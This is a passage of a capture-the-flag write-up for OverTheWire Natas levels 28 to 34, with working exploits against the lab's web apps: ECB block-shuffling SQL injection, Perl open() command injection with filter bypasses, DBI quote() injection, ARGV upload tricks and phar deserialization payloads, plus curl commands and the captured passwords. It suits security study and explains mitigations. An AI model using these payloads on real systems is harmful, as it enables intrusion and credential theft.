|block| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10| 11| 12| 13| 14| 15|
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   0 | S | E | L | E | C | T |   | * |   | f | r | o | m |   | j | o |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   1 | k | e | s |   | w | h | e | r | e |   | j | o | k | e |   | l |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   2 | i | k | e |   | ' | % | a | a | a | a | a | a | a | a | a | a |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   3 | a | a | a | % | ' | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   4 | ? | P | P | P | P | P | P | P | P | P | P | P | P | P | P | P |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
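
The point at which the extra block appears also says something about the total plaintext length. The Python sketch below assumes PKCS#7 padding (as the error message suggests) and takes the probe output at face value: 80 bytes of ciphertext up to 12 characters of input, 96 bytes from 13 onwards. The helper names are hypothetical:

```python
BLOCK_SIZE = 16


def pkcs7_pad(data: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """Pad to a multiple of block_size; a full block is added if already aligned."""
    pad_len = block_size - len(data) % block_size
    return data + bytes([pad_len]) * pad_len


def padded_length(plaintext_length: int) -> int:
    return len(pkcs7_pad(b"x" * plaintext_length))


# Which fixed (non-user) plaintext lengths are consistent with the probe?
candidates = [
    fixed
    for fixed in range(0, 128)
    if padded_length(fixed + 12) == 80 and padded_length(fixed + 13) == 96
]
print(candidates)
```

Under these assumptions only one fixed length remains, which narrows down how much query text surrounds the user input even though its exact content is unknown.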

Based on previous exercises it is probably safe to assume that user data is in a table named users and the password in a password field. Knowing this, one could either inject a UNION statement into the existing query, producing something like this:

SELECT * from jokes where joke like '%...'
union all select password from users -- %...'

... or the much simpler:

SELECT password from users #

Armed with this information, the objective will be to produce the following state:

      +---------------------------------------------------------------+
      |                             byte                              |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|block| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10| 11| 12| 13| 14| 15|
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   0 | S | E | L | E | C | T |   | * |   | f | r | o | m |   | j | o |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   1 | k | e | s |   | w | h | e | r | e |   | j | o | k | e |   | l |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   2 | i | k | e |   | ' | % | a | a | a | a | a | a | a | a | a | a |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   3 | S | E | L | E | C | T |   | p | a | s | s | w | o | r | d |   |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   4 | f | r | o | m |   | u | s | e | r | s |   | # |   | a | a | a |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   5 | a | a | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+
|   6 | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? | ? |
+-----+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+

The length (10 + n * 16) is chosen to avoid any padding and have "clean" blocks.
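
To double check the alignment before sending anything, the block layout can be printed locally. This Python sketch uses the query prefix guessed above; PREFIX and layout are illustrative names, and the real query may of course differ beyond what the probes confirmed:

```python
BLOCK_SIZE = 16
# Guessed from the probes: 32 confirmed bytes plus "ike '%" in block 2.
PREFIX = "SELECT * from jokes where joke like '%"


def layout(user_input: str, block_size: int = BLOCK_SIZE) -> list:
    """Split prefix + input into cipher-sized blocks (the unknown suffix is ignored)."""
    text = PREFIX + user_input
    return [text[i:i + block_size] for i in range(0, len(text), block_size)]


injected = "SELECT password from users #"
for number, block in enumerate(layout(10 * "a" + injected)):
    print(f"{number}: {block!r}")
```

With 10 filler characters the injected statement starts exactly at block 3, so everything from that block onwards can be cut out and submitted on its own.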

The following small program can be used to experiment with creating query strings to send to the application:

natas28.py

import base64
import sys
import requests
from urllib.parse import unquote
from urllib.parse import quote_plus
from sys import argv

URL = "http://natas28.natas.labs.overthewire.org"
AUTH = ("natas28", "JW..")
PAD_CHAR = "a"
BLOCK_SIZE = 16


def create_query(user_query) -> str:
    r = requests.post(URL, auth=AUTH, params={"query": user_query})
    _, query = r.url.split("=")
    query = base64.b64decode(unquote(query))
    query = query[3 * (BLOCK_SIZE) :]  # slice from chunk 3
    return quote_plus(base64.b64encode(query))


def main():
    user_query = 10 * PAD_CHAR + argv[1]
    # ensure input is > 32 and evenly divisible by block size
    while len(user_query) % BLOCK_SIZE != 0 or len(user_query) <= BLOCK_SIZE * 2:
        user_query += PAD_CHAR
    sys.stdout.write(create_query(user_query))


if __name__ == "__main__":
    main()

The output can be used to test queries, for example:

$ curl -s -u natas28:$PW \
> http://natas28.natas.labs.overthewire.org/search.php\
> ?query=$(python3 natas28.py "SELECT * from jokes #")
# ... all jokes

This confirms that the approach is working as expected and the application can be made to execute user-controlled SQL statements. However, running it with the intended query produces an error:

$ curl -s -u natas28:$PW \
> http://natas28.natas.labs.overthewire.org/search.php\
> ?query=$(python3 natas28.py "SELECT password from users #")
# ...
<b>Notice</b>:  Undefined index: joke in <b>/var/www/natas/natas28/search.php</b> on line <b>92</b><br />
# ...

This error is likely a result of the application attempting to access the results from the SQL query by accessing the joke column for each row in the response. The query can be updated to return the password in a column named joke:

$ curl -s -u natas28:$PW \
> http://natas28.natas.labs.overthewire.org/search.php\
> ?query=$(python3 natas28.py "SELECT password as joke from users #") |
> tac | grep -oEm1 "[[:alnum:]]{32}"
airooCaiseiyee8he8xongien9euhe8b

And there we have it.

Conclusion

This level required quite a bit more effort compared to most other levels in the Natas series so far. It does an excellent job of highlighting the shortcomings of using ECB mode for block ciphers. In fact, it is hard to find use cases where ECB is better suited than other modes such as GCM.

Level 29

This level switches to a programming language that is probably equally hated and loved: Perl. There is no source code provided, but on the other hand it might not be readable anyway ¯\_(ツ)_/¯. Right-clicking is disabled with JavaScript and the oncontextmenu event.

The application allows the user to select files from a drop-down list, where each file contains one issue of a "Perl Underground" zine. The actual contents of the text do not seem relevant for the level, which is appreciated given the length and questionable quality of the content.

Selecting a page from the drop-down list triggers a GET request with the file name in the file query parameter:

<form action="index.pl" method="GET">
<select name="file" onchange="this.form.submit()">
  <option value="">s3lEcT suMp1n!</option>
  <option value="perl underground">perl underground</option>
  <option value="perl underground 2">perl underground 2</option>
  <option value="perl underground 3">perl underground 3</option>
  <option value="perl underground 4">perl underground 4</option>
  <option value="perl underground 5">perl underground 5</option>
</select>
</form>

Specifying an arbitrary file appears to result in no text output, and a file name that contains natas (e.g. /etc/natas_webpass/natas30) outputs a "meeeeeep!" message.

It is probable that the application uses open to read the file. This function comes with a few different signatures and various modes of operation that make it very versatile:

Instead of a filename, you may specify an external command (plus an optional argument list) or a scalar reference, in order to open filehandles on commands or in-memory scalars, respectively.

One of these modes enables running a command instead of reading from a file. This is done using the | character and can be convenient as it provides easy access to shell commands, for example for post-processing of some input. If using the 2-argument version of open, this convenience comes at a significant cost: arbitrary command execution.

A basic test can confirm this theory:

$ curl -s -u natas29:$PW \
> http://natas29.natas.labs.overthewire.org/index.pl?\
> file=\|printf%20hello | tail -2
</html>
hello.txt

Command injection is successful and the output is appended to the response, followed by a .txt that is added to the file name by the application. This can be avoided by terminating the input with a null character (%00). Using this approach to dump the application's source code explains why file names containing natas are rejected:

$ curl -s -u natas29:$PW \
> http://natas29.natas.labs.overthewire.org/index.pl?\
> file=\|cat%20index.pl%00 | sed -n "/if/,/^}/p"
if(param('file')){
    $f=param('file');
    if($f=~/natas/){
        print "meeeeeep!<br>";
    }
    else{
        open(FD, "$f.txt");
        print "<pre>";
        while (<FD>){
            print CGI::escapeHTML($_);
        }
        print "</pre>";
    }
}

The natas filter can easily be bypassed using shell expansions:

$ curl -s -u natas29:$PW \
> http://natas29.natas.labs.overthewire.org/index.pl?\
> file=\|cat%20/etc/n*tas_webpass/n*tas30%00 | tail -1
wie9iexae0Daihohv8vuu3cei9wahf0e
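
The bypass works because the filter looks at the literal string while the shell expands the wildcard later. A rough Python model of both sides follows; rejected_by_filter is a hypothetical stand-in for the Perl regex check, and fnmatch only approximates shell globbing:

```python
import fnmatch
import re
from urllib.parse import quote


def rejected_by_filter(file_param: str) -> bool:
    """Model of the Perl check `$f =~ /natas/`."""
    return re.search(r"natas", file_param) is not None


target = "/etc/natas_webpass/natas30"
pattern = "/etc/n*tas_webpass/n*tas30"
file_param = f"|cat {pattern}\x00"

print(rejected_by_filter(f"|cat {target}\x00"))  # the literal path is caught
print(rejected_by_filter(file_param))            # the wildcard version is not
print(fnmatch.fnmatchcase(target, pattern))      # yet the pattern still matches the file
print(quote(file_param, safe="/*|"))             # value for the file query parameter
```

Blocklisting a substring is rarely enough once the value reaches a shell, since globbing, quoting and variable expansion all offer ways to spell the same path differently.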

Conclusion

The lesson in this level is that using the 2-argument version of open is subject to a whole range of problems. The correct implementation would be to use the 3-argument open, which separates the mode from the file name and explicitly opens the file for reading (<):

open(my $fh, "<", "$f.txt");

In reading up on issues in Perl in CGI environments, I found the following useful resources:

Level 30

This level introduces the DBI module:

use CGI qw(:standard);
use DBI;
# ...
if ('POST' eq request_method && param('username') && param('password')){
    my $dbh = DBI->connect( "DBI:mysql:natas30","natas30", "<censored>", {'RaiseError' => 1});
    my $query="Select * FROM users where username =".$dbh->quote(param('username')) . " and password =".$dbh->quote(param('password'));

    my $sth = $dbh->prepare($query);
    $sth->execute();
    my $ver = $sth->fetch();
    if ($ver){
        print "win!<br>";
        print "here is your result:<br>";
        print @$ver;
    }
    else{
        print "fail :(";
    }
    $sth->finish();
    $dbh->disconnect();
}

The objective is quite clear: make the database query return the record for natas31. quote is used which appears to prevent the most straightforward types of SQL injection. However, in reading the documentation it becomes clear this is not always the case:

$sql = $dbh->quote($value);
$sql = $dbh->quote($value, $data_type);

If $data_type is supplied, it is used to try to determine the required quoting behavior by using the information returned by "type_info". As a special case, the standard numeric types are optimized to return $value without calling type_info.

With 2 arguments to the function it is possible to avoid quotes being escaped altogether given a numeric $data_type. One such data type is SQL_NUMERIC which is assigned the code 2.

So how to pass 2 arguments to quote? It turns out CGI will evaluate repeated parameters as a list. Here's a breakdown:

By passing password twice in the request:

/?username=natas31&password=%27whatever%27%20or%20true&password=2

... this statement will be executed:

$dbh->quote("'whatever' or true", 2); # -> "'whatever' or true"

... making the program run this following query:

Select * FROM users where username ='natas31'
and password ='whatever' or true;

... which rather unsurprisingly returns the password:

$ curl -s -u natas30:$PW \
> -X POST http://natas30.natas.labs.overthewire.org/index.pl \
> -d username=natas31 \
> -d password="'whatever' or true" -d password=2 |
> tac | grep -oEm1 "[[:alnum:]]{32,}"
natas31hay7aecuungiuKaezuathuk9biin0pu1
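
The interaction between the repeated parameter and the second argument can be modelled in a few lines. The Python sketch below is a toy: quote only imitates the rule quoted from the documentation (numeric type, no quoting), its escaping for the string case is a simplification, and parse_qs stands in for CGI's list-valued param:

```python
from urllib.parse import parse_qs

SQL_NUMERIC = 2  # type code mentioned above


def quote(value: str, data_type=None) -> str:
    """Toy model of the quoting rule described in the DBI documentation."""
    if data_type is not None and int(data_type) == SQL_NUMERIC:
        return value  # numeric types are returned as-is
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


body = "username=natas31&password=%27whatever%27%20or%20true&password=2"
params = parse_qs(body)  # repeated keys become lists, much like param() in list context

query = (
    "Select * FROM users where username =" + quote(*params["username"])
    + " and password =" + quote(*params["password"])
)
print(params["password"])
print(query)
```

The list is silently spread over the function's parameters, so the second password value ends up choosing the quoting behavior for the first.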

Conclusion

This is a rather straightforward SQL injection, enabled by the somewhat odd behavior of both the CGI param and DBI quote functions.

The best mitigation to avoid an SQL injection might be to use placeholders, for example:

my $sth = $dbh->prepare(
    "SELECT *
    FROM users
    WHERE username = ?
    AND password = ?"
);
$sth->bind_param(1, $username);
$sth->bind_param(2, $password);
$sth->execute();

This would prevent any issues with quoting the query, regardless of how param and quote are used. Additionally, scalar could be used with param to avoid getting an unexpected list:

my $password = scalar(param('password'));

On a final note, anyone building a CGI application in 2022 might be testing their sanity, so these issues are not very relevant. In fact, CGI has been removed from perl core.

Level 31

More perl madness. This time a file upload form:

my $cgi = CGI->new;
if ($cgi->upload('file')) {
    my $file = $cgi->param('file');
    print '<table class="sortable table table-hover table-striped">';
    $i=0;
    while (<$file>) {
        my @elements=split /,/, $_;

        if($i==0){ # header
            print "<tr>";
            foreach(@elements){
                print "<th>".$cgi->escapeHTML($_)."</th>";   
            }
            print "</tr>";
        }
        else{ # table content
            print "<tr>";
            foreach(@elements){
                print "<td>".$cgi->escapeHTML($_)."</td>";   
            }
            print "</tr>";
        }
        $i+=1;
    }
    print '</table>';
}

This exact issue - backed by an impressive collection of camel imagery - is explained very well in The Perl Jam 2: The Camel Strikes Back. The TL;DR of that presentation is:

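there is magic behavior for <ARGV>: it opens and reads every file named in the program arguments
upload() checks whether at least one of the file parameters is an uploaded file
the assignment my $file = $cgi->param('file'); stores the first file parameter into $file, whether or not it is an uploaded file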

In summary, all that is needed is to:

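provide a file to upload in the file parameter
provide another file parameter, placed first, set to the string ARGV
and finally a query string without an = sign, which the web server passes to the script as a command-line argument and which therefore ends up in ARGV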

... adding some curl- and grep-Fu:

$ touch natas31.csv
$ curl -s -u natas31:$PW \
> "http://natas31.natas.labs.overthewire.org/index.pl?%2Fetc%2Fnatas_webpass%2Fnatas32" \
> -F 'file=ARGV' -F 'file=@natas31.csv' |
> tac | grep -oEm1 '[[:alnum:]]{32}'
no1vohsheCaiv3ieH4em1ahchisainge

Conclusion

🐪 + 💻 + 🌐 = 🙈

Level 32

32 picks up where 31 left off. The same source code is provided, but a command must be executed to get to the password. As noted in 29, appending | to the file name makes the open() function execute a command.

$ touch natas32.csv
# overworked way of using curl for url-encoding because why not
$ QUERY=$(curl -sG . --data-urlencode "/bin/ls -Al . |" -w "%{url_effective}" |
> cut -d "?" -f2)
$ curl -s -u natas32:$PW \
> "http://natas32.natas.labs.overthewire.org/index.pl?${QUERY}" \
> -F 'file=ARGV' -F 'file=@natas32.csv' |
> grep -oE ".rw.+$"
-rw-r----- 1 natas32 natas32   119 Dec 15  2016 .htaccess
-rw-r----- 1 natas32 natas32   129 Oct 20  2018 .htpasswd
-rwsrwx--- 1 root    natas32  7168 Dec 15  2016 getpassword
-rwxr-x--- 1 natas32 natas32   235 Dec 15  2016 getpassword.c
-rwxr-x--- 1 natas32 natas32   236 Dec 15  2016 getpassword.c.tmpl
-rwxr-x--- 1 natas32 natas32  9667 Dec 15  2016 index-source.html
-rwxr-x--- 1 natas32 natas32  2952 Dec 15  2016 index-source.pl
-rwxr-x--- 1 natas32 natas32  2991 Dec 15  2016 index.pl
-rwxr-x--- 1 natas32 natas32  2952 Dec 15  2016 index.pl.tmpl
-rwxr-x--- 1 natas32 natas32 97180 Dec 15  2016 jquery-1.12.3.min.js
-rwxr-x--- 1 natas32 natas32 16877 Dec 15  2016 sorttable.js
drwxr-x--- 2 natas32 natas32  4096 Mar  4 01:53 tmp
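
If the curl -w trick feels too roundabout, the encoding can also be sketched with POSIX tools only. urlencode is a hypothetical helper, not something used in the original solution; it percent-encodes every byte, including letters and digits, which is longer than necessary but still decodes to the same string:

```shell
# Hypothetical helper: percent-encode every byte of the first argument.
urlencode() {
    # dump bytes as hex (-v: never collapse repeated lines),
    # strip whitespace, then prefix each hex pair with %
    printf '%s' "$1" | od -An -v -tx1 | tr -d '[:space:]' | sed 's/../%&/g'
}

QUERY=$(urlencode './getpassword |')
printf '%s\n' "$QUERY"
```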

Running getpassword does exactly what you think it does:

$ QUERY=$(curl -sG . --data-urlencode './getpassword |' -w "%{url_effective}" |
> cut -d "?" -f2)
$ curl -s -u natas32:$PW \
> "http://natas32.natas.labs.overthewire.org/index.pl?${QUERY}" \
> -F "file=ARGV" -F "file=@natas32.csv" |
> tac | grep -oEm1 "[[:alnum:]]{32}"
shoogeiGa2yee3de6Aex8uaXeech5eey

Conclusion

⚠ 🐪 ⚠

Level 33

33 provides a form to upload a file. For each uploaded file, __construct() and __destruct() magic methods are called. The __destruct() implementation includes a call to passthru() to execute the file:

<?php
    session_start();
    if(array_key_exists("filename", $_POST) and array_key_exists("uploadedfile",$_FILES)) {
        new Executor();
    }
?>
<?php
    class Executor{
        private $filename=""; 
        private $signature='adeafbadbabec0dedabada55ba55d00d';
        private $init=False;

        function __construct(){
            $this->filename=$_POST["filename"];
            if(filesize($_FILES['uploadedfile']['tmp_name']) > 4096) {
                echo "File is too big<br>";
            }
            else {
                if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], "/natas33/upload/" . $this->filename)) {
                    echo "The update has been uploaded to: /natas33/upload/$this->filename<br>";
                    echo "Firmware upgrad initialised.<br>";
            } # ...
        }
    }

        function __destruct(){
            # ...
            if(md5_file($this->filename) == $this->signature){
                echo "Congratulations! Running firmware update: $this->filename <br>";
                passthru("php " . $this->filename);
            } # ...
        }
    }
?>

While it might be possible to craft a file with the required MD5 hash, it is unlikely that this is the intended way to solve the challenge. Usage of magic methods provides a hint that a deserialization attack might be possible, but there is no usage of unserialize -- the approach used for 26 cannot be re-used.

The technique described by Sam Thomas in a Black Hat presentation seems to be applicable here and may even have inspired the challenge.

The TL;DR of that presentation is:

PHP applications can be packed into a "Phar" (PHP Archive) file
PHP provides a phar:// stream wrapper which enables using such phar files in place of file names for file-related functions
phar archives can include metadata which can be any PHP variable that can be serialized

At this point you might be thinking that the last bullet sounds potentially problematic. And you'd be right!

The phar:// wrapper is constrained such that it operates on local files only. As a result, it cannot be disabled by the allow_url_fopen and allow_url_include INI options. The limited scope of local files might be sufficient to prevent uncontrolled deserialization in some contexts, but for applications that allow uploading files this might no longer apply. Also, the phar archive format lends itself to polyglot files, for example a file that is simultaneously a valid phar and a valid JPEG, which provides a convenient way to circumvent restrictions on certain file types.

This means it should be possible to:

create a php file with code to be injected in passthru
upload the file
create a phar with metadata containing an instance of the Executor class with a filename property matching the file created in the first step
upload the phar
call the API using phar://phar-file-name
the phar metadata will be unserialized, instantiating the Executor class, which will run the code from the first step
???
profit!

Payload

The following should do:

natas33.php

<?php include("/etc/natas_webpass/natas34"); ?>

Phar

An excellent sample for creating a phar file is available in the PayloadsAllTheThings repo. This should be good enough:

natas33.phar.php

<?php
class Executor{
    private $filename="natas33.php";
    # any non-empty hash string loosely equals true, so the == check passes
    private $signature=True;
}

$phar = new Phar("natas33.phar");
$phar->startBuffering();
# https://www.php.net/manual/en/phar.fileformat.stub.php
$phar->setStub("<?php __HALT_COMPILER();");
$phar->setMetadata(new Executor());
# at least 1 file is required
$phar["fish.txt"] = "moo";
$phar->stopBuffering();
?>

Running the script produces the archive. The phar.readonly INI setting must be disabled to create or modify an archive:

$ php -d phar.readonly=false natas33.phar.php

Exploit

$ curl -s http://natas33.natas.labs.overthewire.org/index.php \
> -u natas33:$PW -o /dev/null \
> -F "uploadedfile=@natas33.php" -F "filename=natas33.php" # known filename
$ curl -s http://natas33.natas.labs.overthewire.org/index.php \
> -u natas33:$PW -o /dev/null \
> -F "uploadedfile=@natas33.phar" -F "filename=natas33.phar"
$ curl -s http://natas33.natas.labs.overthewire.org/index.php \
> -u natas33:$PW \
> -F "uploadedfile=@natas33.phar" -F "filename=phar://natas33.phar/fish.txt" |
> tac | grep -oEm1 "[[:alnum:]]{32}"
shu5ouSu6eicielahhae0mohd4ui5uig

Conclusion

A simple way to mitigate this issue is to filter out any stream wrappers in user-supplied file names. Additionally, this behavior was changed in PHP 8.0: metadata is no longer unserialized automatically, and getMetadata() must be called for deserialization to happen.
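
The filter itself belongs in the PHP application; to stay with the shell used throughout this walkthrough, the check is sketched here as a hypothetical is_plain_filename helper. It assumes that rejecting any name containing a scheme:// prefix is acceptable for the application, and it is not meant as a complete validation routine:

```shell
# Hypothetical helper: succeeds only for names without a scheme:// prefix.
is_plain_filename() {
    case "$1" in
        "")    return 1 ;;  # empty names are never valid
        *://*) return 1 ;;  # phar://, php://, file://, ...
        *)     return 0 ;;
    esac
}

for name in natas33.php 'phar://natas33.phar/fish.txt'; do
    if is_plain_filename "$name"; then
        echo "accept: $name"
    else
        echo "reject: $name"
    fi
done
```

With such a check in front of the upload handler, the third request of the exploit would be rejected before md5_file() ever sees the phar:// path.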

Level 34

$ curl -s http://natas34.natas.labs.overthewire.org \
> -u natas34:$PW | sed -n "/<div/,/div>/p"
<div id="content">
Congratulations! You have reached the end... for now.
</div>

Looks like that's it for Natas!

Closing Thoughts

Natas does an excellent job at introducing several web security concepts. I want to thank the authors at OverTheWire for their efforts in producing this content and making it available at no cost for the rest of us to enjoy!

As a secondary objective, I decided not to rely on any external web exploit software but do as much as possible from the command line and exercise my shell muscle memory a bit. In that process I learned many new (to me) curl and regex options and discovered the tac utility, which was really useful when grepping for passwords.
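
To illustrate why tac helps, here is a small offline sketch with made-up 32-character strings (last_password is a hypothetical name, and tac is assumed to come from GNU coreutils). grep -m1 stops at the first matching line, so reversing the input first yields the last match in the page instead of the first:

```shell
# Hypothetical helper: print the last 32-character alphanumeric run on stdin.
last_password() {
    tac | grep -oEm1 '[[:alnum:]]{32}'
}

printf '%s\n' \
    'stale: fedcba9876543210fedcba9876543210' \
    'unrelated line' \
    'fresh: 0123456789abcdef0123456789abcdef' |
    last_password
# prints: 0123456789abcdef0123456789abcdef
```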

With all levels completed, I plan to revisit my solutions and do some clean-up of explanations and code snippets, possibly also identifying alternate solutions.